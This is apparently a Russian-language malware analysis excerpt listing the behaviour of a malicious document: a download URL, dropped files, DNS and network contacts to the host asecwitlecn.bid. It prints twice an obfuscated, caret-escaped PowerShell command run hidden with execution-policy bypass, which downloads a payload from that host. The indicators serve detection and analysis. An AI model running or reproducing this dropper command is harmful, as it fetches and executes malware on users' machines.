Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWE^Rsh^EL^l.Ex^E -EXE^C^ut^io^NPoL^icy by^pasS -^N^O^prO^filE -w^InDOWs^Ty^L^E hI^dDen (Ne^W-O^bJECT SY^sT^Em^.Net.wE^BcLIenT)^.doWNloA^dFi^l^E('http://asecwitlecn.bid/read.php...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "POWE^Rsh^EL^l.Ex^E -EXE^C^ut^io^NPoL^icy by^pasS -^N^O^prO^filE -w^InDOWs^Ty^L^E hI^dDen (Ne^W-O^bJECT SY^sT^Em^.Net.wE^BcLIenT)^.doWNloA^dFi^l^E('http://asecwitlecn.bid/read.php...' (со скрытым окном)